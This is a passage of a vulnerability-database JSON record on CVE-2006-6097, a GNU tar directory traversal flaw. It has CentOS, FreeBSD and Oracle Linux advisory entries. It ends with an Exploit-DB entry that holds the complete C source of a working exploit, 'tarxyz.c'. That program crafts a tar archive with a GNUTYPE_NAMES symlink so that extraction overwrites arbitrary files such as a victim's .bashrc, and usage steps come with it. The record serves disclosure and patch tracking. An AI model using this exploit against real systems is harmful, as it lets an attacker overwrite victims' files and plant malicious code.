advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-December/013433.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-December/013434.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-December/013437.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-December/013438.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-December/013439.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-December/013440.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-December/013443.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-December/013444.html\n\n**Affected packages:**\ntar\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2006-0749.html", "edition": 2, "reporter": "CentOS Project", "published": "2006-12-20T15:42:51", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "tar security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2006-6097"], "modified": "2006-12-23T11:16:19", "href": "http://lists.centos.org/pipermail/centos-announce/2006-December/013433.html", "id": "CESA-2006:0749", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-10-12T14:46:59", "references": ["https://rhn.redhat.com/errata/rh21as-errata.html", "http://www.ict.swin.edu.au/staff/jnewbigin"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "2", "packageVersion": "1.13.25-6.AS21.1", "arch": "i386", "packageName": "tar", "packageFilename": "tar-1.13.25-6.AS21.1.i386.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2006:0749-01\n\n\nThe GNU tar program saves many files together in one archive and can\r\nrestore individual files (or all of the files) from that archive. \r\n\r\nTeemu Salmela discovered a path traversal flaw in the way GNU tar extracted\r\narchives. A malicious user could create a tar archive that could write to\r\narbitrary files to which the user running GNU tar has write access.\r\n(CVE-2006-6097)\r\n\r\nUsers of tar should upgrade to this updated package, which contains a\r\nreplacement backported patch to correct this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-December/013431.html\n\n**Affected packages:**\ntar\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 2, "reporter": "CentOS Project", "published": "2006-12-20T03:41:54", "title": "tar security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-6097"], "modified": "2006-12-20T03:41:54", "href": "http://lists.centos.org/pipermail/centos-announce/2006-December/013431.html", "id": "CESA-2006:0749-01", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2018-08-31T01:15:44", "references": ["http://archives.neohapsis.com/archives/fulldisclosure/2006-11/0344.html"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "1.16_2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "gtar", "operator": "lt"}], "description": "\nTeemu Salmela reports:\n\nThere is a tar record type, called GNUTYPE_NAMES (an\n\t obsolete GNU extension), that allows the creation of\n\t symbolic links pointing to arbitrary locations in the\n\t filesystem, which makes it possible to create/overwrite\n\t arbitrary files.\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2006-11-21T00:00:00", "title": "gtar -- GNUTYPE_NAMES directory traversal vulnerability", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-6097"], "modified": "2006-11-21T00:00:00", "id": "3DD7EB58-80AE-11DB-B4EC-000854D03344", "href": "https://vuxml.freebsd.org/freebsd/3dd7eb58-80ae-11db-b4ec-000854d03344.html", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:42:01", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.13.25-15.RHEL3", "arch": "src", "packageFilename": "tar-1.13.25-15.RHEL3.src.rpm", "packageName": "tar", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.13.25-15.RHEL3", "arch": "src", "packageFilename": "tar-1.13.25-15.RHEL3.src.rpm", "packageName": "tar", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.13.25-15.RHEL3", "arch": "i386", "packageFilename": "tar-1.13.25-15.RHEL3.i386.rpm", "packageName": "tar", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.14-12.RHEL4", "arch": "i386", "packageFilename": "tar-1.14-12.RHEL4.i386.rpm", "packageName": "tar", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.14-12.RHEL4", "arch": "x86_64", "packageFilename": "tar-1.14-12.RHEL4.x86_64.rpm", "packageName": "tar", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.14-12.RHEL4", "arch": "src", "packageFilename": "tar-1.14-12.RHEL4.src.rpm", "packageName": "tar", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.14-12.RHEL4", "arch": "src", "packageFilename": "tar-1.14-12.RHEL4.src.rpm", "packageName": "tar", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.13.25-15.RHEL3", "arch": "x86_64", "packageFilename": "tar-1.13.25-15.RHEL3.x86_64.rpm", "packageName": "tar", "operator": "lt"}], "description": " [1.14-12.RHEL4]\n - fix CVE-2006-6097 GNU tar directory traversal (#216937)\n \n [1.14-11.RHEL4]\n - fix verbose output (#192770) ", "edition": 3, "reporter": "Oracle", "published": "2006-12-20T00:00:00", "title": "Moderate tar security update ", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-6097"], "modified": "2006-12-20T00:00:00", "id": "ELSA-2006-0749", "href": "http://linux.oracle.com/errata/ELSA-2006-0749.html", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T09:43:30", "osvdbidlist": ["30721"], "references": [], "edition": 1, "description": "GNU Tar 1.1x GNUTYPE_NAMES Remote Directory Traversal Vulnerability. CVE-2006-6097. Remote exploit for linux platform", "reporter": "Teemu Salmela", "published": "2006-11-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "exploitdb", "title": "GNU Tar 1.1x GNUTYPE_NAMES Remote Directory Traversal Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6097"], "modified": "2006-11-21T00:00:00", "id": "EDB-ID:29160", "href": "https://www.exploit-db.com/exploits/29160/", "sourceData": "source: http://www.securityfocus.com/bid/21235/info\r\n\r\nGNU Tar is prone to a vulnerability that may allow an attacker to place files and overwrite files in arbitrary locations on a vulnerable computer. These issues present themselves when the application processes malicious archives. \r\n\r\nA successful attack can allow the attacker to place potentially malicious files and overwrite files on a computer in the context of the user running the affected application. Successful exploits may aid in further attacks.\r\n\r\n /*\r\n * tarxyz.c - GNU tar directory traversal exploit.\r\n * Written by Teemu Salmela.\r\n *\r\n * Example usage (creates a tar file that extracts /home/teemu/.bashrc):\r\n * $ gcc -o tarxyz tarxyz.c\r\n * $ ./tarxyz > ~/xyz.tar\r\n * $ mkdir -p /tmp/xyz/home/teemu/\r\n * $ cp ~/newbashrc.txt /tmp/xyz/home/teemu/.bashrc\r\n * $ cd /tmp\r\n * $ tar -rf ~/xyz.tar xyz/home/teemu\r\n */\r\n\r\n #include <string.h>\r\n #include <stdio.h>\r\n #include <stdlib.h>\r\n\r\n struct posix_header\r\n{ /* byte offset */\r\n char name[100]; /* 0 */\r\n char mode[8]; /* 100 */\r\n char uid[8]; /* 108 */\r\n char gid[8]; /* 116 */\r\n char size[12]; /* 124 */\r\n char mtime[12]; /* 136 */\r\n char chksum[8]; /* 148 */\r\n char typeflag; /* 156 */\r\n char linkname[100]; /* 157 */\r\n char magic[6]; /* 257 */\r\n char version[2]; /* 263 */\r\n char uname[32]; /* 265 */\r\n char gname[32]; /* 297 */\r\n char devmajor[8]; /* 329 */\r\n char devminor[8]; /* 337 */\r\n char prefix[155]; /* 345 */\r\n /* 500 */\r\n };\r\n\r\n #define GNUTYPE_NAMES 'N'\r\n\r\n #define BLOCKSIZE 512\r\n\r\n union block\r\n {\r\n char buffer[BLOCKSIZE];\r\n struct posix_header header;\r\n };\r\n\r\n void\r\n data(void *p, size_t size)\r\n {\r\n size_t n = 0;\r\n char b[BLOCKSIZE];\r\n\r\n while (size - n > 512) {\r\n fwrite(&((char *)p)[n], 1, 512, stdout);\r\n n += 512;\r\n }\r\n if (size - n) {\r\n memset(b, 0, sizeof(b));\r\n memcpy(b, &((char *)p)[n], size - n);\r\n fwrite(b, 1, sizeof(b), stdout);\r\n }\r\n }\r\n\r\n int\r\n main(int argc, char *argv[])\r\n {\r\n char *link_name = \"xyz\";\r\n union block b;\r\n char *d;\r\n int i;\r\n unsigned int cksum;\r\n\r\n if (argc > 1)\r\n link_name = argv[1];\r\n\r\n if (asprintf(&d, \"Symlink / to %s\\n\", link_name) < 0) {\r\n fprintf(stderr, \"out of memory\\n\");\r\n exit(1);\r\n }\r\n memset(&b, 0, sizeof(b));\r\n strcpy(b.header.name, \"xyz\");\r\n strcpy(b.header.mode, \"0000777\");\r\n strcpy(b.header.uid, \"0000000\");\r\n strcpy(b.header.gid, \"0000000\");\r\n sprintf(b.header.size, \"%011o\", strlen(d));\r\n strcpy(b.header.mtime, \"00000000000\");\r\n strcpy(b.header.chksum, \" \");\r\n b.header.typeflag = GNUTYPE_NAMES;\r\n strcpy(b.header.magic, \"ustar \");\r\n strcpy(b.header.uname, \"root\");\r\n strcpy(b.header.gname, \"root\");\r\n for (cksum = 0, i = 0; i < sizeof(b); i++)\r\n cksum += b.buffer[i] & 0xff;\r\n sprintf(b.header.chksum, \"%06o \", cksum);\r\n fwrite(&b, 1, sizeof(b), stdout);\r\n data(d, strlen(d));\r\n }\r\n\r\n\r\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29160/"}]}